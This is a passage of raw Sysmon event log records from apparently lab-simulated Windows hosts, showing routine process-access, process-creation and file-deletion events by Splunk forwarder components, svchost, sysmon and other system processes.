Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000017494Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.973{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E53C-63C7-1D02-00000000B002}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017493Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.971{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017492Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.971{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017491Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.971{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017490Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.971{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017489Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017488Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017487Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017486Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017485Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017484Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E53C-63C7-1D02-00000000B002}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017483Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E53C-63C7-1D02-00000000B002}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017482Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.970{E5A8D418-E53C-63C7-1D02-00000000B002}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017481Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.956{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF774F983F377ADFB2A88900C289F2AC,SHA256=49CE869D67E94B5D9B47CAD11FC509DD5E96FB2B94ADB6F2F9191EE1D0E62753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:32.710{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E977C6C65558B1562CF0777311D24E55,SHA256=E0C2675F2487A48B49A5CBC164EE6AC7C6E51002B8BA0829C4FFA13DB7D1909A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017480Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.480{E5A8D418-E53C-63C7-1C02-00000000B002}31681828C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017479Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E53C-63C7-1C02-00000000B002}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017478Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017477Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017476Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017475Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017474Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017473Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017472Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017471Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017470Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017469Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E53C-63C7-1C02-00000000B002}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017468Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:32.300{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program 